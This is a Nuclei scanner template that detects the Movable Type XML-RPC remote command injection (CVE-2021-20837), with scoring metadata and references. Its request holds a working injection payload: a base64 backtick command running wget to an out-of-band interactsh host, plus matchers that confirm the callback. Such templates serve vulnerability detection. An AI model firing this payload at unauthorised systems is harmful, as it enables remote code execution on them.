nuclei-templates/http/cves/2021/CVE-2021-20837.yaml

63 lines
1.9 KiB
YAML
Raw Normal View History

2021-10-29 12:43:32 +00:00
id: CVE-2021-20837
info:
name: MovableType - Remote Command Injection
2021-10-29 16:46:25 +00:00
author: dhiyaneshDK,hackergautam
severity: critical
description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
2021-10-29 12:43:32 +00:00
reference:
2021-10-29 16:03:59 +00:00
- https://nemesis.sh/posts/movable-type-0day/
2021-10-29 12:43:32 +00:00
- https://github.com/ghost-nemesis/cve-2021-20837-poc
2021-10-29 16:03:59 +00:00
- https://twitter.com/cyber_advising/status/1454051725904580608
- https://nvd.nist.gov/vuln/detail/CVE-2021-20837
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/164818/Movable-Type-7-r.5002-XMLRPC-API-Remote-Command-Injection.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-20837
cwe-id: CWE-78
2023-08-31 11:46:18 +00:00
epss-score: 0.97158
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.99701
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: sixapart
product: movable_type
2023-07-12 11:56:50 +00:00
tags: packetstorm,cve,cve2021,rce,movable
2021-10-29 12:43:32 +00:00
http:
2021-10-29 12:43:32 +00:00
- raw:
- |
2021-10-29 16:03:59 +00:00
POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1
2021-10-29 12:43:32 +00:00
Host: {{Hostname}}
Content-Type: text/xml
2021-10-29 16:03:59 +00:00
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>mt.handler_to_coderef</methodName>
<params>
<param>
<value>
<base64>
{{base64("`wget http://{{interactsh-url}}`")}}
</base64>
</value>
</param>
</params>
</methodCall>
matchers-condition: and
2021-10-29 12:43:32 +00:00
matchers:
2021-10-29 16:03:59 +00:00
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
words:
- "failed loading package"
2021-10-29 12:43:32 +00:00
2021-10-29 16:03:59 +00:00
- type: status
status:
- 200